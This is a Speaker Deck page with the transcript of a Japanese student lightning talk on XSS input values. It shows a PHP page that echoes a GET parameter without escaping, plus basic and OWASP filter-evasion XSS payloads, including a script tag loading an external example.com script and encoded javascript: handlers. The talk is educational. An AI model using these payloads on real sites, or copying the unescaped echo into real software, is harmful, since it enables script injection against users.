Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Query Prediction for Log Search for Distributed Tracing with External Monitoring Alerts
tomoyk
0
15
Root Cause Analysis for Middleware Issues by Kubernetes Resource Events / KST-2026
tomoyk
0
26
Reading HTTP Client Hints
tomoyk
0
120
Log message with JSON item count for root cause analysis in microservices
tomoyk
1
250
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
380
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
460
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
1
1k
検索性能に配慮した複製による分散ログ管理 / DPS-185
tomoyk
0
10
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
430
Other Decks in Technology
See All in Technology
自動テストが巻き起こした開発プロセス・チームの変化 / Impact of Automated Testing on Development Cycles and Team Dynamics
codmoninc
3
1.3k
20260311 ビジネスSWG活動報告(デジタルアイデンティティ人材育成推進WG Ph2 活動報告会)
oidfj
0
190
モブプログラミング再入門 ー 基本から見直す、AI時代のチーム開発の選択肢 ー / A Re-introduction of Mob Programming
takaking22
5
1.2k
OCI Security サービス 概要
oracle4engineer
PRO
2
13k
EMからVPoEを経てCTOへ:マネジメントキャリアパスにおける葛藤と成長
kakehashi
PRO
9
1.5k
[JAWSDAYS2026]Who is responsible for IAM
mizukibbb
0
330
2026-03-11 JAWS-UG 茨城 #12 改めてALBを便利に使う
masasuzu
2
330
マネージャー版 "提案のレベル" を上げる
konifar
22
15k
わたしがセキュアにAWSを使えるわけないじゃん、ムリムリ!(※ムリじゃなかった!?)
cmusudakeisuke
1
480
Kaggleの経験が実務にどう活きているか / kaggle_findy
sansan_randd
7
1.3k
Claude Code Skills 勉強会 (DevelersIO向けに調整済み) / claude code skills for devio
masahirokawahara
1
12k
JAWS Days 2026 楽しく学ぼう! 認証認可 入門/20260307-jaws-days-novice-lane-auth
opelab
10
1.7k
Featured
See All Featured
The innovator’s Mindset - Leading Through an Era of Exponential Change - McGill University 2025
jdejongh
PRO
1
120
What the history of the web can teach us about the future of AI
inesmontani
PRO
1
460
brightonSEO & MeasureFest 2025 - Christian Goodrich - Winning strategies for Black Friday CRO & PPC
cargoodrich
3
120
Skip the Path - Find Your Career Trail
mkilby
1
75
Effective software design: The role of men in debugging patriarchy in IT @ Voxxed Days AMS
baasie
0
250
Collaborative Software Design: How to facilitate domain modelling decisions
baasie
0
150
Fashionably flexible responsive web design (full day workshop)
malarkey
408
66k
Six Lessons from altMBA
skipperchong
29
4.2k
Neural Spatial Audio Processing for Sound Field Analysis and Control
skoyamalab
0
210
How to Grow Your eCommerce with AI & Automation
katarinadahlin
PRO
1
140
Winning Ecommerce Organic Search in an AI Era - #searchnstuff2025
aleyda
1
1.9k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
35
2.4k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
SiteGround - Reliable hosting with speed, security, and support you can count on.
tomoyk
codmoninc
.png){kind=avatar}
oidfj
takaking22
oracle4engineer
kakehashi
mizukibbb
masasuzu
konifar
cmusudakeisuke
sansan_randd
masahirokawahara
opelab
jdejongh
inesmontani
cargoodrich
mkilby
baasie
malarkey
skipperchong
skoyamalab
katarinadahlin
aleyda
marcduiker
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
